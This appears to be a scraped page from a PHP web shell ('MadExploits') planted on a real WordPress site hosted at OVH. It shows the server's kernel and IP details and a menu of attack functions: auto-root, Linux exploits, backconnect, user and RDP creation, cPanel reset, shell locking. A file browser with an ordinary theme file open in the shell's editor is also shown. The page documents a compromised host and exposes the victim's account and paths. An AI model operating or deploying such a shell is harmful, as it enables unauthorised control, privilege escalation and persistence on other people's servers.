Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
www /
wp-content /
themes /
imroz /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
customizer
[ DIR ]
drwxr-xr-x
helper
[ DIR ]
drwxr-xr-x
lab
[ DIR ]
drwxr-xr-x
options
[ DIR ]
drwxr-xr-x
underscore
[ DIR ]
drwxr-xr-x
comment-form.php
6.49
KB
-rw-r--r--
comment-nav.php
585
B
-rw-r--r--
demo-import-config.php
22.07
KB
-rw-r--r--
global-functions.php
4.89
KB
-rw-r--r--
register-custom-fonts.php
1.14
KB
-rw-r--r--
scripts.php
4.5
KB
-rw-r--r--
tgm-config.php
2.29
KB
-rw-r--r--
widget-area-register.php
2.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : widget-area-register.php
<?php /** * Register widget area. * * @link https://developer.wordpress.org/themes/functionality/sidebars/#registering-a-sidebar */ if(!function_exists('imroz_widgets_init')){ function imroz_widgets_init() { register_sidebar(array( 'name' => esc_html__('Sidebar', 'imroz'), 'id' => 'sidebar-1', 'description' => esc_html__('Add widgets here.', 'imroz'), 'before_widget' => '<div id="%1$s" class="rbt-single-widget %2$s mt--50 mt_sm--30 mt_md--30 mt_lg--40">', 'after_widget' => '</div>', 'before_title' => '<h4 class="title mb--20">', 'after_title' => '</h4>', )); if ( class_exists( 'WooCommerce' ) ) { register_sidebar(array( 'name' => esc_html__('Shop Sidebar', 'imroz'), 'id' => 'sidebar-shop', 'description' => esc_html__('Add widgets here.', 'imroz'), 'before_widget' => '<div id="%1$s" class="rbt-single-widget %2$s mt--50 mt_sm--30 mt_md--30 mt_lg--40">', 'after_widget' => '</div>', 'before_title' => '<h4 class="title mb--20">', 'after_title' => '</h4>', )); } $number_of_widget = 4; $imroz_widget_titles = array( '1' => esc_html__( 'Footer Widget Area 1', 'imroz' ), '2' => esc_html__( 'Footer Widget Area 2', 'imroz' ), '3' => esc_html__( 'Footer Widget Area 3', 'imroz' ), '4' => esc_html__( 'Footer Widget Area 4', 'imroz' ), ); for ( $i = 1; $i <= $number_of_widget; $i++ ) { register_sidebar( array( 'name' => $imroz_widget_titles[$i], 'id' => 'footer-'. $i, 'before_widget' => '<div id="%1$s" class="footer-widget widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<h4 class="title">', 'after_title' => '</h4>', ) ); } } } add_action( 'widgets_init', 'imroz_widgets_init' );
Close